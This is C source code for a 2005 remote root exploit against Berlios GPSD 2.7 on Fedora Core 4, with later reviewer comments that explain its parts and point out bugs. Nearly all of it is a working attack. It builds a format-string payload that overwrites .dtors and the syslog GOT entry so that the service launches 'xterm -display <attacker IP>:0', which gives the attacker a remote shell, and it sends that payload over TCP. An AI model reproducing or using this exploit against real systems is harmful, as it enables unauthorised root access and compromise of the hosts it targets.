/*
** FC4 (exec-shield) based Berlios GPSD 2.7 remote root exploit
** by Xpl017Elz
**
** Bug Found By: KF
**
** Advanced exploitation in exec-shield (Fedora Core case study)
** URL: http://x82.inetcop.org/h0me/papers/FC_exploit/FC_exploit.txt
**
** Reference: http://www.securityfocus.com/bid/12371 (2005/01/26)
**
** --
** exploit by "you dong-hun"(Xpl017Elz), .
** My World: http://x82.inetcop.org
*/

/*
 * NOTE(review): the six #include targets were lost when this listing was
 * extracted (the angle-bracketed header names were stripped). Judging by the
 * calls below (sscanf/sprintf, memset/strncpy, strtoul/atoi, getopt/close,
 * gethostbyname, sockaddr_in/htons) they were presumably the usual stdio,
 * string, stdlib, unistd, netdb and socket/inet headers -- confirm against
 * the original source before building.
 */
#include
#include
#include
#include
#include
#include

/*
 * Build-specific constants. Every address below is tied to one particular
 * FC4 gpsd 2.7 binary and glibc from 2005; each can be overridden from the
 * command line (see the getopt loop in main and usage()). HOST is a sentinel
 * meaning "no target given": main() prints usage when host still equals it.
 */
#define HOST "x0x"
#define PORT 2947
#define DF_SFLAG 14      /* first positional index used in the "%d$n" pairs */
#define DF_OFFSET 17     /* subtracted from the buffer index in the first %u width */
#define DTORS_AUX 0x08048ec8
#define DTOR_END_ADDR 0x0804c110
#define SYSLOG_RETLOC 0x0804c250
#define DO_SYSTEM 0x00749f3c
#define XHOST_IP "82.82.82.82"   /* placeholder default, replaced by -i */

/*
 * Prototypes. NOTE(review): usage() is declared without a parameter list but
 * defined below as usage(char *arg0); conn_shell() is declared but has no
 * definition anywhere in this listing.
 */
void banrl();
void usage();
void re_connt(int sock);
int setsock(char *host,int port);
void conn_shell(int sock);

/*
 * Command string stored as 16-bit little-endian halves (0x7478 = "xt",
 * 0x7265 = "er", ...). The five 0x4141 entries at indices 5..9 are
 * placeholders that get_10_ip() overwrites with the decimal form of the
 * address given via -i. Declared as long[] although only the low 16 bits of
 * each entry are meaningful.
 */
long xterm_shell[]={
    // do_system("xterm -di ip_addr");
    0x7478,0x7265,
    0x206d,0x642d,
    0x2069,0x4141, /* IP address */
    0x4141,0x4141,
    0x4141,0x4141,
    0x303a,0x0000
};
/* Next xterm_shell slot to fill; reset to 5 on every get_10_ip() call. */
int xterm_ip_count=5;

/*
 * Convert the dotted-quad string in ipbuf to its decimal 32-bit value,
 * rewrite ipbuf in place with that decimal text, and store its first ten
 * characters pairwise (as little-endian 16-bit values) into xterm_shell[5..9].
 *
 * ipbuf: caller-owned buffer. NOTE(review): it is memset to 256 bytes
 *        regardless of its real size, so it must be at least 256 bytes; both
 *        call sites in main() pass xhost_ip_buf[256].
 * Returns 0 unconditionally; parse failures are not reported.
 */
int get_10_ip(char *ipbuf){
    char tbuf[32];
    int i=0;
    unsigned long ip,ip1,ip2,ip3,ip4;
    /* NOTE(review): reads ip4 before it is ever assigned -- undefined
     * behaviour; the values are only overwritten if sscanf matches all
     * four fields. */
    ip=ip1=ip2=ip3=ip4;
    /* NOTE(review): "%d" expects int* but unsigned long* is passed; this
     * only happens to work where sizeof(int) == sizeof(long) (i386). */
    sscanf(ipbuf,"%d.%d.%d.%d",&ip1,&ip2,&ip3,&ip4);
#define IP1 16777216   /* 256^3 */
#define IP2 65536      /* 256^2 */
#define IP3 256
    ip=0;
    ip+=ip1 * (IP1);
    ip+=ip2 * (IP2);
    ip+=ip3 * (IP3);
    ip+=ip4;
    /* Replace the dotted text with the plain decimal number (at most 10
     * digits for a 32-bit value); the zero fill means shorter numbers are
     * padded with NUL bytes in the loop below. */
    memset((char *)ipbuf,0,256);
    sprintf(ipbuf,"%lu",ip);
    xterm_ip_count=5;
    /* Five iterations: characters (i, i+1) become one 16-bit entry with the
     * second character in the high byte. */
    for(i=0;i<10;i+=2){
        memset((char *)tbuf,0,sizeof(tbuf));
        snprintf(tbuf,sizeof(tbuf)-1,"0x%02x%02x",ipbuf[i+1],ipbuf[i]);
        ip=strtoul(tbuf,NULL,0);
        xterm_shell[xterm_ip_count++]=ip;
    }
    return 0;
}

/*
 * Entry point: parse options, assemble the request buffer do_ex, connect to
 * host:port and send it, then connect a second time and close. The buffer is
 * a printf-style format string; its leading part is a list of 4-byte
 * addresses and the remainder is sixteen "%<width>u%<index>$n" pairs whose
 * widths are computed from the addresses and xterm_shell entries above.
 *
 * Exit status is -1 (255) on every path, including the "exploit end" path,
 * so the caller cannot distinguish success from failure.
 */
int main(int argc,char *argv[]){
    int sock,i=0;   /* i doubles as the getopt result and, later, the buffer index */
    int sflag=DF_SFLAG;
    unsigned long do_system_addr=DO_SYSTEM;
    unsigned long dtors_aux_addr=DTORS_AUX;
    unsigned long syslog_retloc=SYSLOG_RETLOC;
    unsigned long retloc=DTOR_END_ADDR;
    int do_system_head=0;
    int do_system_tail=0;
    int dtors_aux_head=0;
    int dtors_aux_tail=0;
    char do_ex[1024];
    char xhost_ip_buf[256]=XHOST_IP;
    char host[256]=HOST;
    int port=PORT;
    extern char *optarg;
    /* Fill xterm_shell from the default address; redone if -i is given. */
    get_10_ip(xhost_ip_buf);
    memset((char *)do_ex,0,sizeof(do_ex));
    (void)banrl();
    /* Upper- and lower-case forms of each option are accepted. Numeric
     * options go through strtoul(...,0) so hex or decimal both work; none of
     * them is range-checked. */
    while((i=getopt(argc,argv,"R:r:D:d:S:s:G:g:I:i:H:h:P:p:"))!=EOF){
        switch(i){
            case 'R': case 'r':
                retloc=strtoul(optarg,NULL,0);
                break;
            case 'D': case 'd':
                do_system_addr=strtoul(optarg,NULL,0);
                break;
            case 'S': case 's':
                syslog_retloc=strtoul(optarg,NULL,0);
                break;
            case 'G': case 'g':
                dtors_aux_addr=strtoul(optarg,NULL,0);
                break;
            case 'I': case 'i':
                memset((char *)xhost_ip_buf,0,sizeof(xhost_ip_buf));
                strncpy(xhost_ip_buf,optarg,sizeof(xhost_ip_buf)-1);
                get_10_ip(xhost_ip_buf);
                break;
            case 'H': case 'h':
                memset((char *)host,0,sizeof(host));
                strncpy(host,optarg,sizeof(host)-1);
                break;
            case 'P': case 'p':
                /* NOTE(review): atoi gives no error indication; a bad value
                 * silently becomes port 0. */
                port=atoi(optarg);
                break;
            case '?':
            default:
                (void)usage(argv[0]);   /* usage() exits; break is never reached */
                break;
        }
    }
    /* -h is mandatory: host still holding the sentinel means none was given. */
    if(!strcmp(host,HOST)){
        (void)usage(argv[0]);
    }
    fprintf(stdout," [+] make exploit code.\n");
    /* NOTE(review): %p is given unsigned long arguments, not pointers --
     * a format/type mismatch; harmless on i386 where both are 32 bits. */
    fprintf(stdout," [+] .dtors address: %p\n",retloc);
    fprintf(stdout," [+] do_system address: %p\n",do_system_addr);
    fprintf(stdout," [+] syslog GOT address: %p\n",syslog_retloc);
    fprintf(stdout," [+] __do_global_dtors_aux: %p\n",dtors_aux_addr);
    /* Split the two 32-bit addresses into upper/lower 16-bit halves. */
    do_system_head=(do_system_addr>>16)&0xffff;
    do_system_tail=(do_system_addr>>0)&0xffff;
    dtors_aux_head=(dtors_aux_addr>>16)&0xffff;
    dtors_aux_tail=(dtors_aux_addr>>0)&0xffff;
    i=0;
    /* Three bytes of padding, then sixteen 4-byte addresses: fourteen
     * consecutive 2-byte slots from retloc, then two from syslog_retloc.
     * NOTE(review): the (long *) stores through a char buffer are unaligned,
     * type-punning writes (strict-aliasing/alignment UB) that happen to work
     * on i386; memcpy would be the well-defined form. */
    do_ex[i++]='_';
    do_ex[i++]='_';
    do_ex[i++]='_';
    *(long *)&do_ex[i]=retloc; i+=4;
    *(long *)&do_ex[i]=retloc+2; i+=4;
    *(long *)&do_ex[i]=retloc+4; i+=4;
    *(long *)&do_ex[i]=retloc+6; i+=4;
    *(long *)&do_ex[i]=retloc+8; i+=4;
    *(long *)&do_ex[i]=retloc+10; i+=4;
    *(long *)&do_ex[i]=retloc+12; i+=4;
    *(long *)&do_ex[i]=retloc+14; i+=4;
    *(long *)&do_ex[i]=retloc+16; i+=4;
    *(long *)&do_ex[i]=retloc+18; i+=4;
    *(long *)&do_ex[i]=retloc+20; i+=4;
    *(long *)&do_ex[i]=retloc+22; i+=4;
    *(long *)&do_ex[i]=retloc+24; i+=4;
    *(long *)&do_ex[i]=retloc+26; i+=4;
    *(long *)&do_ex[i]=syslog_retloc; i+=4;
    *(long *)&do_ex[i]=syslog_retloc+2; i+=4;
    /* Sixteen "%<width>u%<index>$n" pairs; each width is the 16-bit
     * difference from the previous value (+0x10000 keeps it positive).
     * NOTE(review): sprintf into do_ex+i is unbounded; with these widths the
     * text fits in the 1024-byte buffer, but nothing checks that. */
    sprintf(do_ex+i,
        "%%%ux%%%d$n%%%ux%%%d$n"
        "%%%ux%%%d$n%%%ux%%%d$n"
        "%%%ux%%%d$n%%%ux%%%d$n"
        "%%%ux%%%d$n%%%ux%%%d$n"
        "%%%ux%%%d$n%%%ux%%%d$n"
        "%%%ux%%%d$n%%%ux%%%d$n"
        "%%%ux%%%d$n%%%ux%%%d$n"
        "%%%ux%%%d$n%%%ux%%%d$n",
        do_system_tail-(i+DF_OFFSET),sflag+0,
        (0x10000+do_system_head)-do_system_tail,sflag+1,
        (0x10000+xterm_shell[0])-do_system_head,sflag+2,
        (0x10000+xterm_shell[1])-xterm_shell[0],sflag+3,
        (0x10000+xterm_shell[2])-xterm_shell[1],sflag+4,
        (0x10000+xterm_shell[3])-xterm_shell[2],sflag+5,
        (0x10000+xterm_shell[4])-xterm_shell[3],sflag+6,
        (0x10000+xterm_shell[5])-xterm_shell[4],sflag+7,
        (0x10000+xterm_shell[6])-xterm_shell[5],sflag+8,
        (0x10000+xterm_shell[7])-xterm_shell[6],sflag+9,
        (0x10000+xterm_shell[8])-xterm_shell[7],sflag+10,
        (0x10000+xterm_shell[9])-xterm_shell[8],sflag+11,
        (0x10000+xterm_shell[10])-xterm_shell[9],sflag+12,
        (0x10000+xterm_shell[11])-xterm_shell[10],sflag+13,
        (0x10000+dtors_aux_tail)-xterm_shell[11],sflag+14,
        (0x10000+dtors_aux_head)-dtors_aux_tail,sflag+15);
    fprintf(stdout," [+] make socket.\n");
    fprintf(stdout," [+] host: %s.\n",host);
    fprintf(stdout," [+] port: %d.\n",port);
    sock=setsock(host,port);
    re_connt(sock);   /* exits if setsock() returned -1 */
    fprintf(stdout," [*] send exploit code.\n");
    /* NOTE(review): the send() return value is ignored, so a short or
     * failed write is reported as if it succeeded. */
    send(sock,do_ex,strlen(do_ex),0);
    close(sock);
    /* A second connect/close with no payload. */
    fprintf(stdout," [*] syslog reconnect.\n");
    sock=setsock(host,port);
    re_connt(sock);
    close(sock);
    fprintf(stdout," [*] exploit end.\n\n");
    exit(-1);
}

/* Print the program banner to stdout. */
void banrl(){
    fprintf(stdout,"\n FC4 (exec-shield) based Berlios GPSD 2.7 remote root exploit\n");
    fprintf(stdout," by Xpl017Elz\n\n");
}

/*
 * Print option help and terminate with status -1.
 * arg0: program name (argv[0]) shown in the Usage and Example lines.
 * Never returns.
 */
void usage(char *arg0){
    fprintf(stdout," Usage: %s -options arguments\n\n",arg0);
    fprintf(stdout,"\t-r [retloc] - .dtors address.\n");
    fprintf(stdout,"\t-d [do_system] - do_system address.\n");
    fprintf(stdout,"\t-s [syslog] - syslog GOT address.\n");
    fprintf(stdout,"\t-g [dtors_aux] - __do_global_dtors_aux address.\n");
    fprintf(stdout,"\t-i [ip] - attacker xhost ip.\n");
    fprintf(stdout,"\t-h [host] - target hostname.\n");
    fprintf(stdout,"\t-p [port] - target port number.\n");
    fprintf(stdout,"\t-? - help information.\n\n");
    fprintf(stdout," Example: %s -h localhost -p 2947\n\n",arg0);
    exit(-1);
}

/*
 * Abort the program if a setsock() result indicates failure.
 * sock: value returned by setsock(); -1 means connect failed.
 */
void re_connt(int sock)
{
    if(sock==-1)
    {
        fprintf(stdout," [-] Failed.\n\n");
        exit(-1);
    }
}

/*
 * Resolve host, open a TCP socket and connect it to host:port.
 * Returns the connected socket descriptor, or -1 on any failure.
 *
 * NOTE(review): if connect() fails the already-created socket is returned
 * as -1 without being closed, leaking one descriptor per failed attempt.
 * gethostbyname()/bzero() are obsolete interfaces (getaddrinfo/memset are
 * the current forms), and socket()/connect() are compared against EOF
 * rather than -1; they agree only because EOF happens to be -1.
 */
int setsock(char *host,int port)
{
    int sock;
    struct hostent *he;
    struct sockaddr_in x82_addr;
    if((he=gethostbyname(host))==NULL)
    {
        return(-1);
    }
    if((sock=socket(AF_INET,SOCK_STREAM,0))==EOF)
    {
        return(-1);
    }
    x82_addr.sin_family=AF_INET;
    x82_addr.sin_port=htons(port);
    /* Only the first resolved address is used. */
    x82_addr.sin_addr=*((struct in_addr *)he->h_addr);
    bzero(&(x82_addr.sin_zero),8);
    if(connect(sock,(struct sockaddr *)&x82_addr,sizeof(struct sockaddr))==EOF)
    {
        return(-1);   /* sock is leaked here, see note above */
    }
    return(sock);
}
/* eoc */